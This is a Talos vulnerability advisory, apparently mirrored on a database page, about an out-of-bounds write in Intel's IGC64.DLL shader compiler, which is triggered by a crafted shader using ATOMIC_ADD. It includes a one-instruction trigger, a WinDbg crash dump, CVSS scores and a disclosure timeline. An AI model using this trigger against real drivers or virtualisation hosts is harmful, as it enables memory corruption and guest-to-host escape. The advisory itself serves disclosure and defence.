Lucene search

K
talosTalos IntelligenceTALOS-2020-0979
HistoryJul 14, 2020 - 12:00 a.m.

Intel IGC64.DLL shader functionality ATOMIC_ADD code execution vulnerability

2020-07-1400:00:00
Talos Intelligence
www.talosintelligence.com
93
intel
igc64.dll
atomic_add
code execution
vulnerability
vertex shader
memory corruption
out-of-bounds write
guest-to-host escape
virtualization environments
web browser
webgl
webassembly
shader functionality

CVSS2

7.7

Attack Vector

ADJACENT_NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:A/AC:L/Au:S/C:C/I:C/A:C

CVSS3

9

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

AI Score

9.3

Confidence

High

EPSS

0.002

Percentile

57.8%

Summary

An exploitable memory corruption vulnerability exists in Intel’s IGC64.DLL graphics driver, version 26.20.100.7584. A specially crafted vertex shader can cause an out-of-bounds write, which could lead to arbitrary code execution. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability could potentially be triggered from guest machines running on virtualization environments (e.g. VMware, QEMU, VirtualBox etc.) to perform guest-to-host escape - as it was demonstrated before in TALOS-2018-0533, TALOS-2018-0568, etc. Theoretically, this vulnerability could be also triggered from a web browser (using WebGL and WebAssembly) but Talos has not been able to confirm this.

Tested Versions

Intel IGC64.DLL (Intel Graphics Shader Compiler for Intel® Graphics Accelerator), version 26.20.100.7584
Microsoft Hyper-V with RemoteFX enabled (CVE-2020-1036)

Product URLs

http://intel.com

CVSSv3 Score

8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-787: Out-of-bounds Write

Details

This vulnerability can be triggered by supplying a malformed vertex shader, leading to an out-of-bounds write in the Intel IGC64 driver (this driver is mapped by the affected component, e.g. VMware’s vmware-vmx.exe).

Example of pixel shader triggering the bug (can include only one instruction to trigger the bug):

LEN:0004 ad 00 00 01 atomic_iadd

ATOMIC_ADD is an instruction included in Shader Model 5 language and it is designed to atomically add integer to memory.
By emitting this single instruction it is possible to cause an arbitrary memory write:

igc64!OpenCompiler12+338c0
00007ffc`7133b050 c681d000000000  mov     byte ptr [rcx+0D0h],0
WRITE_ADDRESS:  00000173c8c800d0 

Stack trace:

0:000> kb
 # RetAddr           : Args to Child                                                           : Call Site
00 00007ffc`713344e3 : 00000173`c67ef750 00000173`c67e760c 00000173`c67e7624 00000173`c67e7628 : igc64!OpenCompiler12+0x338c0
01 00007ffc`713341a3 : 00000000`00000000 00000173`c67f0da0 00000173`c67ef750 00000173`c67e760c : igc64!OpenCompiler12+0x2cd53
02 00007ffc`7133406f : 00000173`c67e760c 00000173`c67e760c 00000173`c67e760c 00000173`c67eee50 : igc64!OpenCompiler12+0x2ca13
03 00007ffc`7130c37a : 00000173`c67e98e0 00000173`c67e9a00 00000173`c67e9a00 00000173`c67e9a00 : igc64!OpenCompiler12+0x2c8df
04 00007ffc`7130b6cd : 00000000`00000000 00000173`c67e80c8 00000067`b20fcac0 00007ffc`837dbabb : igc64!OpenCompiler12+0x4bea
05 00007ffc`7130cbf3 : 00000173`c67e8098 00007ffc`75013537 00000173`c67e8150 00000000`00000000 : igc64!OpenCompiler12+0x3f3d
06 00007ffc`748f7946 : 00000173`c67e7fb0 00000000`00000000 00000173`c6720d50 00000000`00000001 : igc64!OpenCompiler12+0x5463
07 00007ffc`750bb966 : 00000173`bfa16080 00000173`c67e7a50 00000173`c67e9720 00000067`b20fc620 : igd10iumd64!OpenAdapter10_2+0x30326
08 00007ffc`7cc28edc : 00000000`00000000 00000173`c67e7a38 00000173`c6716e30 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x7f4346
09 00007ffc`7cc3295f : 00000067`00000001 00000173`c6720d48 00000173`c67e7a38 00000173`c6716e30 : d3d11!CPixelShader::CLS::FinalConstruct+0x23c
0a 00007ffc`7cc3289a : 00000067`b20fe3e0 00007ffc`3ff47a18 00000173`c67e7660 00000173`bf990320 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
0b 00007ffc`7cc1ee58 : 00000173`c67e7928 00000067`b20fe3e0 00000067`b20fe360 00007ffc`3ff47a18 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x152
0c 00007ffc`7cc2b17d : 00000000`00000040 00000173`c67e76a8 00000173`bf989a70 00000067`0c040109 : d3d11!CDevice::CreateLayeredChild+0xc88
0d 00007ffc`3fed3ade : 00000173`c67e76a8 00000000`00000000 00000000`00000000 00000000`00000009 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
0e 00007ffc`3fec0d83 : 00000173`c67e7758 00000000`00000000 00000000`00000000 00000173`c67e7660 : D3D11_3SDKLayers!NDebug::CDeviceChild<ID3D11PixelShader>::FinalConstruct+0x82
0f 00007ffc`3fe7da23 : 00000173`c67e7690 00000173`c67e7688 00000173`c67e7688 00000173`c67e7660 : D3D11_3SDKLayers!CLayeredObject<NDebug::CPixelShader>::CreateInstance+0x167
10 00007ffc`7cc2b950 : 00000173`c67e7660 00000000`00000030 00000067`b20fe4d0 00000173`bf990000 : D3D11_3SDKLayers!NDebug::CDevice::CreateLayeredChild+0x773
11 00007ffc`7cc114f4 : 00000173`c670e350 00000067`00000009 00000173`c67e7570 00000173`c670f1e8 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
12 00007ffc`7cc11463 : 00000173`c67e7570 00000000`0000c100 00000000`00000000 00000000`00000001 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x64
13 00007ffc`7cc111e8 : 00000173`c670f1e8 00000173`c67e7570 00000000`000000b8 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x203
14 00007ffc`3fea9f85 : 00000173`c670e3a8 00000173`00000001 00000173`c670e3a8 00000173`c670e3b0 : d3d11!CDevice::CreatePixelShader+0x28

Crash Information

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


KEY_VALUES_STRING: 1

	Key  : AV.Fault
	Value: Write

	Key  : Analysis.CPU.Sec
	Value: 1

	Key  : Analysis.Elapsed.Sec
	Value: 96

	Key  : Analysis.Memory.CommitPeak.Mb
	Value: 72

	Key  : Timeline.OS.Boot.DeltaSec
	Value: 126392

	Key  : Timeline.Process.Start.DeltaSec
	Value: 46


PROCESSES_ANALYSIS: 1

SERVICE_ANALYSIS: 1

STACKHASH_ANALYSIS: 1

TIMELINE_ANALYSIS: 1

Timeline: !analyze.Start
	Name: <blank>
	Time: 2020-01-12T14:36:38.911Z
	Diff: 88 mSec

Timeline: Dump.Current
	Name: <blank>
	Time: 2020-01-12T14:36:39.0Z
	Diff: 0 mSec

Timeline: Process.Start
	Name: <blank>
	Time: 2020-01-12T14:35:53.0Z
	Diff: 46000 mSec

Timeline: OS.Boot
	Name: <blank>
	Time: 2020-01-11T03:30:07.0Z
	Diff: 126392000 mSec


DUMP_CLASS: 2

DUMP_QUALIFIER: 0

MODLIST_WITH_TSCHKSUM_HASH:  68520726b589446b188e9a1fa156e8f36ea4808b

MODLIST_SHA1_HASH:  a128a094da68947a63ade4a350e9f21c32a899c7

NTGLOBALFLAG:  70

APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  272

DUMP_TYPE:  fe

FAULTING_IP: 
igc64!OpenCompiler12+338c0
00007ffc`7133b050 c681d000000000  mov     byte ptr [rcx+0D0h],0

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffc7133b050 (igc64!OpenCompiler12+0x00000000000338c0)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000001
   Parameter[1]: 00000173c8c800d0
Attempt to write to address 00000173c8c800d0

FAULTING_THREAD:  00003b00

DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE

PROCESS_NAME:  SimpleBezier11.exe

FOLLOWUP_IP: 
igc64!OpenCompiler12+338c0
00007ffc`7133b050 c681d000000000  mov     byte ptr [rcx+0D0h],0

WRITE_ADDRESS:  00000173c8c800d0 

ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwo a a si  do pami ci pod adresem 0x%p. Pami   nie mo e by  %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwo a a si  do pami ci pod adresem 0x%p. Pami   nie mo e by  %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  0000000000000001

EXCEPTION_PARAMETER2:  00000173c8c800d0

WATSON_BKT_PROCSTAMP:  5e1a4ea8

WATSON_BKT_MODULE:  igc64.dll

WATSON_BKT_MODSTAMP:  5ddcfccd

WATSON_BKT_MODOFFSET:  a7b050

WATSON_BKT_MODVER:  26.20.100.7584

MODULE_VER_PRODUCT:  Intel HD Graphics Drivers for Windows(R)

BUILD_VERSION_STRING:  18362.1.amd64fre.19h1_release.190318-1202

ANALYSIS_SESSION_HOST:  IAMLEGION

ANALYSIS_SESSION_TIME:  01-12-2020 15:36:38.0911

ANALYSIS_VERSION: 10.0.18914.1001 amd64fre

THREAD_ATTRIBUTES: 
OS_LOCALE:  PLK

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE

PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

PROBLEM_CLASSES: 

	ID:     [0n313]
	Type:   [@ACCESS_VIOLATION]
	Class:  Addendum
	Scope:  BUCKET_ID
	Name:   Omit
	Data:   Omit
	PID:    [Unspecified]
	TID:    [0x3b00]
	Frame:  [0] : igc64!OpenCompiler12

	ID:     [0n286]
	Type:   [INVALID_POINTER_WRITE]
	Class:  Primary
	Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
			BUCKET_ID
	Name:   Add
	Data:   Omit
	PID:    [Unspecified]
	TID:    [0x3b00]
	Frame:  [0] : igc64!OpenCompiler12

LAST_CONTROL_TRANSFER:  from 00007ffc713344e3 to 00007ffc7133b050

STACK_TEXT:  
00000067`b20f66c0 00007ffc`713344e3 : 00000173`c67ef750 00000173`c67e760c 00000173`c67e7624 00000173`c67e7628 : igc64!OpenCompiler12+0x338c0
00000067`b20fc170 00007ffc`713341a3 : 00000000`00000000 00000173`c67f0da0 00000173`c67ef750 00000173`c67e760c : igc64!OpenCompiler12+0x2cd53
00000067`b20fc1b0 00007ffc`7133406f : 00000173`c67e760c 00000173`c67e760c 00000173`c67e760c 00000173`c67eee50 : igc64!OpenCompiler12+0x2ca13
00000067`b20fc2b0 00007ffc`7130c37a : 00000173`c67e98e0 00000173`c67e9a00 00000173`c67e9a00 00000173`c67e9a00 : igc64!OpenCompiler12+0x2c8df
00000067`b20fc340 00007ffc`7130b6cd : 00000000`00000000 00000173`c67e80c8 00000067`b20fcac0 00007ffc`837dbabb : igc64!OpenCompiler12+0x4bea
00000067`b20fc3c0 00007ffc`7130cbf3 : 00000173`c67e8098 00007ffc`75013537 00000173`c67e8150 00000000`00000000 : igc64!OpenCompiler12+0x3f3d
00000067`b20fc480 00007ffc`748f7946 : 00000173`c67e7fb0 00000000`00000000 00000173`c6720d50 00000000`00000001 : igc64!OpenCompiler12+0x5463
00000067`b20fc4c0 00007ffc`750bb966 : 00000173`bfa16080 00000173`c67e7a50 00000173`c67e9720 00000067`b20fc620 : igd10iumd64!OpenAdapter10_2+0x30326
00000067`b20fc520 00007ffc`7cc28edc : 00000000`00000000 00000173`c67e7a38 00000173`c6716e30 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x7f4346
00000067`b20fc950 00007ffc`7cc3295f : 00000067`00000001 00000173`c6720d48 00000173`c67e7a38 00000173`c6716e30 : d3d11!CPixelShader::CLS::FinalConstruct+0x23c
00000067`b20fcbb0 00007ffc`7cc3289a : 00000067`b20fe3e0 00007ffc`3ff47a18 00000173`c67e7660 00000173`bf990320 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
00000067`b20fcc40 00007ffc`7cc1ee58 : 00000173`c67e7928 00000067`b20fe3e0 00000067`b20fe360 00007ffc`3ff47a18 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x152
00000067`b20fcca0 00007ffc`7cc2b17d : 00000000`00000040 00000173`c67e76a8 00000173`bf989a70 00000067`0c040109 : d3d11!CDevice::CreateLayeredChild+0xc88
00000067`b20fd0e0 00007ffc`3fed3ade : 00000173`c67e76a8 00000000`00000000 00000000`00000000 00000000`00000009 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
00000067`b20fd250 00007ffc`3fec0d83 : 00000173`c67e7758 00000000`00000000 00000000`00000000 00000173`c67e7660 : D3D11_3SDKLayers!NDebug::CDeviceChild<ID3D11PixelShader>::FinalConstruct+0x82
00000067`b20fe2e0 00007ffc`3fe7da23 : 00000173`c67e7690 00000173`c67e7688 00000173`c67e7688 00000173`c67e7660 : D3D11_3SDKLayers!CLayeredObject<NDebug::CPixelShader>::CreateInstance+0x167
00000067`b20fe3a0 00007ffc`7cc2b950 : 00000173`c67e7660 00000000`00000030 00000067`b20fe4d0 00000173`bf990000 : D3D11_3SDKLayers!NDebug::CDevice::CreateLayeredChild+0x773
00000067`b20fe490 00007ffc`7cc114f4 : 00000173`c670e350 00000067`00000009 00000173`c67e7570 00000173`c670f1e8 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
00000067`b20fe680 00007ffc`7cc11463 : 00000173`c67e7570 00000000`0000c100 00000000`00000000 00000000`00000001 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x64
00000067`b20fe6e0 00007ffc`7cc111e8 : 00000173`c670f1e8 00000173`c67e7570 00000000`000000b8 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x203
00000067`b20fe890 00007ffc`3fea9f85 : 00000173`c670e3a8 00000173`00000001 00000173`c670e3a8 00000173`c670e3b0 : d3d11!CDevice::CreatePixelShader+0x28
00000067`b20fe8e0 00007ff7`2dad8f49 : 00000000`00000000 00000000`00000000 00000067`b20fe9b8 00000173`c67e7584 : D3D11_3SDKLayers!NDebug::CDevice::CreatePixelShader+0x115
00000067`b20fe950 00007ff7`2dad6bd4 : 00000173`c670e3b0 00000173`bf9a34d0 00000173`00000000 00007ff7`2dd03030 : SimpleBezier11+0x58f49
00000067`b20febb0 00007ff7`2da9f70e : 00000173`c670e3b0 00000173`bf9daeb0 00000000`00000000 00000000`00000000 : SimpleBezier11+0x56bd4
00000067`b20fefb0 00007ff7`2da9bea2 : 00000173`bfa16320 00000173`bfa16301 00000000`00000000 00000000`00000000 : SimpleBezier11+0x1f70e
00000067`b20ff250 00007ff7`2da9821c : 00000173`bfa16320 00470055`00000201 0065006d`005f0032 00720077`005f006d : SimpleBezier11+0x1bea2
00000067`b20ff640 00007ff7`2dad515b : 00007ff7`0000b000 00007ff7`2da80001 ffffffff`00000320 00000000`00000258 : SimpleBezier11+0x1821c
00000067`b20ff840 00007ff7`2db283bd : 00007ff7`2da80000 00000000`00000000 00000173`bf993afc 00007ff7`0000000a : SimpleBezier11+0x5515b
00000067`b20ff8f0 00007ff7`2db2826e : 00007ff7`2db42000 00007ff7`2db423a0 00000000`00000000 00000000`00000000 : SimpleBezier11+0xa83bd
00000067`b20ff930 00007ff7`2db2812e : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : SimpleBezier11+0xa826e
00000067`b20ff9a0 00007ff7`2db28449 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : SimpleBezier11+0xa812e
00000067`b20ff9d0 00007ffc`82497bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : SimpleBezier11+0xa8449
00000067`b20ffa00 00007ffc`8380ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000067`b20ffa30 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


STACK_COMMAND:  ~0s ; .cxr ; kb

THREAD_SHA1_HASH_MOD_FUNC:  35432efb24038964cffc57d4452411c4eec32c8c

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  c6f1f2b85e5669d833f4df518bd941305a60161c

THREAD_SHA1_HASH_MOD:  b69d115479d8aa2381c6e13353a51f982422c1d8

FAULT_INSTR_CODE:  d081c6

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  igc64!OpenCompiler12+338c0

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: igc64

IMAGE_NAME:  igc64.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  5ddcfccd

FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_igc64.dll!OpenCompiler12

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_WRITE_igc64!OpenCompiler12+338c0

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  igc64.dll

BUCKET_ID_IMAGE_STR:  igc64.dll

FAILURE_MODULE_NAME:  igc64

BUCKET_ID_MODULE_STR:  igc64

FAILURE_FUNCTION_NAME:  OpenCompiler12

BUCKET_ID_FUNCTION_STR:  OpenCompiler12

BUCKET_ID_OFFSET:  338c0

BUCKET_ID_MODTIMEDATESTAMP:  5ddcfccd

BUCKET_ID_MODCHECKSUM:  2450ddb

BUCKET_ID_MODVER_STR:  26.20.100.7584

BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_

FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT

FAILURE_SYMBOL_NAME:  igc64.dll!OpenCompiler12

TARGET_TIME:  2020-01-12T14:38:15.000Z

OSBUILD:  18362

OSSERVICEPACK:  329

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

OSEDITION:  Windows 10 WinNt SingleUserTS

USER_LCID:  0

OSBUILD_TIMESTAMP:  unknown_date

BUILDDATESTAMP_STR:  190318-1202

BUILDLAB_STR:  19h1_release

BUILDOSVER_STR:  10.0.18362.1.amd64fre.19h1_release.190318-1202

ANALYSIS_SESSION_ELAPSED_TIME:  17987

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:invalid_pointer_write_c0000005_igc64.dll!opencompiler12

FAILURE_ID_HASH:  {1c89f3a6-178c-7483-67bb-857d785cefd5}

Followup:     MachineOwner
---------

Timeline

2020-01-27 - Vendor Disclosure
2020-04-01 - Disclosure deadline extended
2020-07-14 - Public Release

CVSS2

7.7

Attack Vector

ADJACENT_NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:A/AC:L/Au:S/C:C/I:C/A:C

CVSS3

9

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

AI Score

9.3

Confidence

High

EPSS

0.002

Percentile

57.8%